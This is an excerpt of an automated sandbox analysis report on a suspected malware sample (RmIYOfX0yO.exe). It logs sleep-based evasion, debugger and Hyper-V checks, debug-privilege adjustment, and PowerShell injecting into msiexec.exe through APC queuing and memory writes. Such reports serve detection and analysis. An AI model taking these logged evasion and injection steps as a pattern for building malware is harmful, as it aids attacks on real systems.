      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596594s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -596110s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595985s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595860s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -595110s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594985s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594860s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594735s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594610s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594485s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594360s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594235s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -594110s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exe TID: 4688Thread sleep time: -593985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599625Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599510Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599404Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599297Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599185Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599078Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598969Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598486Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597844Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597719Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597606Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597497Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597391Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597282Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597157Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597032Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596921Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596808Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596594Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594985Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594860Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594110Jump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593985Jump to behavior
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\lq
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: msiexec.exe, 00000009.00000002.2564635002.0000000009D37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW}o*
      Source: msiexec.exe, 00000009.00000002.2564635002.0000000009D37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\lq
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\lq
      Source: powershell.exe, 00000002.00000002.2178786128.0000000004E60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeAPI call chain: ExitProcess graph end nodegraph_0-3613
      Source: C:\Users\user\Desktop\RmIYOfX0yO.exeAPI call chain: ExitProcess graph end nodegraph_0-3605
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0087F520 LdrInitializeThunk,LdrInitializeThunk,2_2_0087F520
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4130000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
